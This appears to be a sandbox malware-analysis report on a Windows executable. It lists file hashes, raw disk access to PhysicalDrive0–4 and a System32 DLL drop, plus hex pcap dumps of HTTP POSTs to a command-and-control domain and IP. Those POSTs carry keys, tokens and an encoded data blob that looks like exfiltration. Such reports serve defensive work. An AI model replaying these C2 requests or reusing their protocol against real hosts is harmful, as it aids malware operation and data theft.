Analysis Date2018-06-11 14:06:07
MD5f57c79e3948364274f304ab088226d1f
SHA137a9ed5b369e2247d9990d6ba4d00034ccbcdc1f

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows
PEhash

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\37a9ed5b369e2247d9990d6ba4d00034ccbcdc1f.exe

Creates FileC:\Windows\System32\oleaccrc.dll
Creates File\??\PhysicalDrive0
Creates File\??\PhysicalDrive1
Creates File\??\PhysicalDrive2
Creates File\??\PhysicalDrive3
Creates File\??\PhysicalDrive4

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f7265 71756573 742f6175   POST /request/au
0x00000010 (00016)   746f6b3f 75736572 3d6c7578 736f6674   tok?user=luxsoft
0x00000020 (00032)   26766572 3d313026 6b65793d 61386435   &ver=10&key=a8d5
0x00000030 (00048)   38386166 65313162 34663833 35393833   88afe11b4f835983
0x00000040 (00064)   30336162 64316231 61666333 20485454   03abd1b1afc3 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d656475 6e6a6120 536f6c6f 64756e6e   Medunja Solodunn
0x00000080 (00128)   6a612036 2e302e30 0d0a436f 6e74656e   ja 6.0.0..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20617069 2d737570 65727472 6f757065    api-supertroupe
0x000000d0 (00208)   722e696e 666f0d0a 436f6e74 656e742d   r.info..Content-
0x000000e0 (00224)   4c656e67 74683a20 300d0a43 61636865   Length: 0..Cache
0x000000f0 (00240)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000100 (00256)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e32 30343a35 3335370d 0a0d0a3c   00.204:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a633434 65333537 642d6139 63612d34   :c44e357d-a9ca-4
0x00000280 (00640)   3662632d 38306632 2d303363 35663764   6bc-80f2-03c5f7d
0x00000290 (00656)   34333736 663c2f77 73613a4d 65737361   4376f</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3562 30656434   >urn:uuid:5b0ed4
0x00000340 (00832)   31642d66 6263362d 34626365 2d616430   1d-fbc6-4bce-ad0
0x00000350 (00848)   612d6561 37653066 61333933 61313c2f   a-ea7e0fa393a1</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f7265 71756573 742f636f   POST /request/co
0x00000010 (00016)   6e646974 696f6e73 3f757365 723d6c75   nditions?user=lu
0x00000020 (00032)   78736f66 74267665 723d3130 266b6579   xsoft&ver=10&key
0x00000030 (00048)   3d616465 38633761 35343965 38396464   =ade8c7a549e89dd
0x00000040 (00064)   62636132 39316539 63386463 32333138   bca291e9c8dc2318
0x00000050 (00080)   3726746f 6b656e3d 30396135 39616264   7&token=09a59abd
0x00000060 (00096)   64373339 30303962 34306635 31313664   d739009b40f5116d
0x00000070 (00112)   37666131 66343433 20485454 502f312e   7fa1f443 HTTP/1.
0x00000080 (00128)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 4d656475   User-Agent: Medu
0x000000a0 (00160)   6e6a6120 536f6c6f 64756e6e 6a612036   nja Solodunnja 6
0x000000b0 (00176)   2e302e30 0d0a436f 6e74656e 742d5479   .0.0..Content-Ty
0x000000c0 (00192)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x000000d0 (00208)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000e0 (00224)   636f6465 640d0a48 6f73743a 20617069   coded..Host: api
0x000000f0 (00240)   2d737570 65727472 6f757065 722e696e   -supertrouper.in
0x00000100 (00256)   666f0d0a 436f6e74 656e742d 4c656e67   fo..Content-Leng
0x00000110 (00272)   74683a20 31363533 0d0a4361 6368652d   th: 1653..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d4d72 74476945   e....data=MrtGiE
0x00000140 (00320)   59673376 7650746c 644d5374 684e5948   Yg3vvPtldMSthNYH
0x00000150 (00336)   626a706a 52333137 5a415a43 46533571   bjpjR317ZAZCFS5q
0x00000160 (00352)   787a5064 66566978 4a35367a 4e6f3932   xzPdfVixJ56zNo92
0x00000170 (00368)   766d4647 72526a53 50366f44 7577486a   vmFGrRjSP6oDuwHj
0x00000180 (00384)   6f414b44 55435252 56697763 312f6b5a   oAKDUCRRViwc1/kZ
0x00000190 (00400)   42675074 6a74626c 47706543 31765a6e   BgPtjtblGpeC1vZn
0x000001a0 (00416)   5a51324c 475a4862 6a686837 70435443   ZQ2LGZHbjhh7pCTC
0x000001b0 (00432)   35727879 624a3938 556d4a4d 52584c55   5rxybJ98UmJMRXLU
0x000001c0 (00448)   64447846 67754438 644c3536 52384651   dDxFguD8dL56R8FQ
0x000001d0 (00464)   38523134 64677737 59394d46 567a5435   8R14dgw7Y9MFVzT5
0x000001e0 (00480)   39675848 79555154 25324238 712f586c   9gXHyUQT%2B8q/Xl
0x000001f0 (00496)   49754252 36253242 415a4861 5246516f   IuBR6%2BAZHaRFQo
0x00000200 (00512)   6d54736d 55753764 63755532 4941396d   mTsmUu7dcuU2IA9m
0x00000210 (00528)   3739496c 68596c4f 72386654 37694c73   79IlhYlOr8fT7iLs
0x00000220 (00544)   4d545149 6b662f64 6a444776 582f4d51   MTQIkf/djDGvX/MQ
0x00000230 (00560)   55516164 544e4571 572f7462 55556a64   UQadTNEqW/tbUUjd
0x00000240 (00576)   6f324f70 586a6436 595a334a 54757847   o2OpXjd6YZ3JTuxG
0x00000250 (00592)   5764414e 41457653 41305647 71583079   WdANAEvSA0VGqX0y
0x00000260 (00608)   436e6e6f 51504e69 51494f6b 72643438   CnnoQPNiQIOkrd48
0x00000270 (00624)   5a612532 42433158 7a66305a 6a346a30   Za%2BC1Xzf0Zj4j0
0x00000280 (00640)   48766d5a 31626859 586d6f56 69456758   HvmZ1bhYXmoViEgX
0x00000290 (00656)   74596138 396e6a6d 37715362 6271336a   tYa89njm7qSbbq3j
0x000002a0 (00672)   586e574f 5976456e 63645a6b 656b494d   XnWOYvEncdZkekIM
0x000002b0 (00688)   46625156 6f546d4c 43344679 6d74706c   FbQVoTmLC4Fymtpl
0x000002c0 (00704)   4c6e522f 652f394f 67784a53 74424a76   LnR/e/9OgxJStBJv
0x000002d0 (00720)   39546351 7a786254 6d52547a 645a6550   9TcQzxbTmRTzdZeP
0x000002e0 (00736)   35434165 77356e4f 64583059 366c6d51   5CAew5nOdX0Y6lmQ
0x000002f0 (00752)   755a4f43 41734f77 6f635867 31566535   uZOCAsOwocXg1Ve5
0x00000300 (00768)   6e446576 77717357 7364784c 6347646c   nDevwqsWsdxLcGdl
0x00000310 (00784)   536f4875 5231726a 344c4e59 4a4b374b   SoHuR1rj4LNYJK7K
0x00000320 (00800)   32497373 34757a54 75334470 2f547061   2Iss4uzTu3Dp/Tpa
0x00000330 (00816)   78785063 6e363941 66767463 42364d5a   xxPcn69AfvtcB6MZ
0x00000340 (00832)   4548775a 79465735 474d725a 4e596470   EHwZyFW5GMrZNYdp
0x00000350 (00848)   50667a65 584e3377 58335068 79483257   PfzeXN3wX3PhyH2W
0x00000360 (00864)   6f30434a 48507633 74657872 69666b63   o0CJHPv3texrifkc
0x00000370 (00880)   695a3765 70565678 79484956 74485a42   iZ7epVVxyHIVtHZB
0x00000380 (00896)   73627a31 79654443 36326a59 786d7474   sbz1yeDC62jYxmtt
0x00000390 (00912)   732f6953 43504374 31723647 50643579   s/iSCPCt1r6GPd5y
0x000003a0 (00928)   5a766355 59253242 78582f38 58444378   ZvcUY%2BxX/8XDCx
0x000003b0 (00944)   68746648 59487448 486a5939 6b414573   htfHYHtHHjY9kAEs
0x000003c0 (00960)   536a6f42 796c6a6e 4f6f6f59 7533566d   SjoByljnOooYu3Vm
0x000003d0 (00976)   55653031 47692f62 64575a52 37545561   Ue01Gi/bdWZR7TUa
0x000003e0 (00992)   4c39446d 2f795944 36576a78 3847612f   L9Dm/yYD6Wjx8Ga/
0x000003f0 (01008)   79746f39 73323156 47384a25 32422532   yto9s21VG8J%2B%2
0x00000400 (01024)   4257374e 65763859 4d783034 36557142   BW7Nev8YMx046UqB
0x00000410 (01040)   4d5a7043 706e4477 64747932 36387743   MZpCpnDwdty268wC
0x00000420 (01056)   43747254 614c4e52 78623879 74433455   CtrTaLNRxb8ytC4U
0x00000430 (01072)   5a75666b 4550334c 3365644f 75654770   ZufkEP3L3edOueGp
0x00000440 (01088)   6573505a 45495a73 554e4949 50357459   esPZEIZsUNIIP5tY
0x00000450 (01104)   47537135 6348774a 4d695a75 474d362f   GSq5cHwJMiZuGM6/
0x00000460 (01120)   62763732 646f7925 32426d37 75686966   bv72doy%2Bm7uhif
0x00000470 (01136)   2f59686b 6c776379 62696a59 584d7855   /YhklwcybijYXMxU
0x00000480 (01152)   30626831 33583059 5252796e 304b3666   0bh13X0YRRyn0K6f
0x00000490 (01168)   61505851 6152384a 25324230 645a7667   aPXQaR8J%2B0dZvg
0x000004a0 (01184)   554c4755 33366634 704b4e4b 434f6779   ULGU36f4pKNKCOgy
0x000004b0 (01200)   67716756 6e476f67 676e7a41 7a454167   gqgVnGoggnzAzEAg
0x000004c0 (01216)   6b487042 394b6a4a 55767861 4344396f   kHpB9KjJUvxaCD9o
0x000004d0 (01232)   32383376 4d444b36 474c7472 55415471   283vMDK6GLtrUATq
0x000004e0 (01248)   52784537 73667652 522f394d 6b7a7030   RxE7sfvRR/9Mkzp0
0x000004f0 (01264)   75395256 45554f56 71763647 4b525248   u9RVEUOVqv6GKRRH
0x00000500 (01280)   4f6b4247 71444e35 3135527a 4c474c59   OkBGqDN515RzLGLY
0x00000510 (01296)   30743568 616c4331 575a7942 58357246   0t5halC1WZyBX5rF
0x00000520 (01312)   4c253242 6f737974 33564e39 30337a63   L%2Bosyt3VN903zc
0x00000530 (01328)   427a306a 4953394c 6e647937 7a496771   Bz0jIS9Lndy7zIgq
0x00000540 (01344)   4f6d6c5a 38734547 74376657 69503345   OmlZ8sEGt7fWiP3E
0x00000550 (01360)   71525868 38314833 434e5133 79384742   qRXh81H3CNQ3y8GB
0x00000560 (01376)   4e486151 436b2532 42654553 53397338   NHaQCk%2BeESS9s8
0x00000570 (01392)   7233356b 5431344c 5139707a 35332f25   r35kT14LQ9pz53/%
0x00000580 (01408)   32425652 734b5869 527a3449 72594971   2BVRsKXiRz4IrYIq
0x00000590 (01424)   6536516d 30556261 464e705a 6147786d   e6Qm0UbaFNpZaGxm
0x000005a0 (01440)   772f3655 655a6844 4e48384d 4343332f   w/6UeZhDNH8MCC3/
0x000005b0 (01456)   69582532 424d4f6e 33596978 384d3955   iX%2BMOn3Yix8M9U
0x000005c0 (01472)   6e31585a 724c304e 6d625464 2f52735a   n1XZrL0NmbTd/RsZ
0x000005d0 (01488)   72703773 64766361 2f783975 74786a75   rp7sdvca/x9utxju
0x000005e0 (01504)   33316950 52685a4e 4a577365 34626c46   31iPRhZNJWse4blF
0x000005f0 (01520)   70706e52 63524644 35745037 56726549   ppnRcRFD5tP7VreI
0x00000600 (01536)   5579322f 4c6e7674 30746d32 65767a2f   Uy2/Lnvt0tm2evz/
0x00000610 (01552)   6d4f4a4f 67535573 65424a5a 2f766757   mOJOgSUseBJZ/vgW
0x00000620 (01568)   66482532 427a6842 4347387a 5643687a   fH%2BzhBCG8zVChz
0x00000630 (01584)   67473558 33466c6b 46346f74 454f365a   gG5X3FlkF4otEO6Z
0x00000640 (01600)   6e4c6773 774c6155 4c723932 584d7861   nLgswLaULr92XMxa
0x00000650 (01616)   655a3362 426b6e56 53316259 316b5356   eZ3bBknVS1bY1kSV
0x00000660 (01632)   7a784462 5556427a 77634339 6558576a   zxDbUVBzwcC9eXWj
0x00000670 (01648)   3246654d 504a386f 68754431 4c783754   2FeMPJ8ohuD1Lx7T
0x00000680 (01664)   344d7159 707a4533 2532422f 62773141   4MqYpzE3%2B/bw1A
0x00000690 (01680)   4d445a76 734c6e77 4e336d4d 53377379   MDZvsLnwN3mMS7sy
0x000006a0 (01696)   5731305a 36683063 4b6a3631 344f7546   W10Z6h0cKj614OuF
0x000006b0 (01712)   4c4e7672 7838394f 6d525772 42477744   LNvrx89OmRWrBGwD
0x000006c0 (01728)   56536b47 4a642532 426c6f64 57396b53   VSkGJd%2BlodW9kS
0x000006d0 (01744)   25324261 314f5774 376a7a57 356c4349   %2Ba1OWt7jzW5lCI
0x000006e0 (01760)   464e504a 42727678 394e6831 415a3041   FNPJBrvx9Nh1AZ0A
0x000006f0 (01776)   67253242 4d6a4155 41456151 57595075   g%2BMjAUAEaQWYPu
0x00000700 (01792)   7a2f7176 6f656751 322f356f 6e56694f   z/qvoegQ2/5onViO
0x00000710 (01808)   316d7434 68544c62 38756525 32425348   1mt4hTLb8ue%2BSH
0x00000720 (01824)   4d526438 7079614e 77317454 71713454   MRd8pyaNw1tTqq4T
0x00000730 (01840)   6c4b7a72 6877375a 664b6e76 48694166   lKzrhw7ZfKnvHiAf
0x00000740 (01856)   6248676d 69453241 4d457668 44377641   bHgmiE2AMEvhD7vA
0x00000750 (01872)   63556937 46756a4c 4e576568 48564d4e   cUi7FujLNWehHVMN
0x00000760 (01888)   54617135 67787579 4a66494d 526d4b6c   Taq5gxuyJfIMRmKl
0x00000770 (01904)   35567673 6562712f 37577965 52775637   5Vvsebq/7WyeRwV7
0x00000780 (01920)   65344849 7a53454f 626c526e 5648614f   e4HIzSEOblRnVHaO
0x00000790 (01936)   66335466 636b386e 58377959 7a6a6c62   f3Tfck8nX7yYzjlb
0x000007a0 (01952)   78335159 6c6b5644 303d                x3QYlkVD0=

0x00000000 (00000)   504f5354 202f7265 71756573 742f6175   POST /request/au
0x00000010 (00016)   746f6b3f 75736572 3d6c7578 736f6674   tok?user=luxsoft
0x00000020 (00032)   26766572 3d313026 6b65793d 61386435   &ver=10&key=a8d5
0x00000030 (00048)   38386166 65313162 34663833 35393833   88afe11b4f835983
0x00000040 (00064)   30336162 64316231 61666333 20485454   03abd1b1afc3 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d656475 6e6a6120 536f6c6f 64756e6e   Medunja Solodunn
0x00000080 (00128)   6a612036 2e302e30 0d0a436f 6e74656e   ja 6.0.0..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20352e31 34392e32 34382e31 33340d0a    5.149.248.134..
0x000000d0 (00208)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000e0 (00224)   300d0a43 61636865 2d436f6e 74726f6c   0..Cache-Control
0x000000f0 (00240)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....


Strings